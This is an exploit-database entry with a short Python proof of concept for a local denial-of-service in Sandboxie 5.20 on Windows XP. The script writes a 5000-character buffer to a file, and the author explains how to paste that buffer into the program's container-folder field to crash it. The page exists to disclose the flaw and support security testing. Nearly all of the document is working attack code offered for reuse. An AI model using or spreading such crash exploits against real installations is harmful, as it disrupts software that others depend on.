Sandboxie 5.20 Denial Of Service



EKU-ID: 6888 CVE: OSVDB-ID:
Author: Anurag Srivastava Published: 2017-08-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python -w
# Exploit Title	    : Sandboxie version 5.20 local Dos Exploit 
# Discovery by      : Anurag Srivastava
# Email             : anurag.srivastava@pyramidcyber.com
# Website 	    : www.pyramidcyber.com
# Discovery Date    : 23/08/2017
# Software Link     : https://www.sandboxie.com/SandboxieInstall.exe
# Tested Version    : 5.20
# Tested on OS      : Windows XP
# Steps to Reproduce: Run the python file to generate pyramid.txt and then open Sandboxie Control->Sandbox->Set Container Folder , Paste the content of pyramid.txt into set container input field.  
file="pyramid.txt"
buffer = "A" *5000   
textfile = open(file, 'w')
textfile.write(buffer)
textfile.close()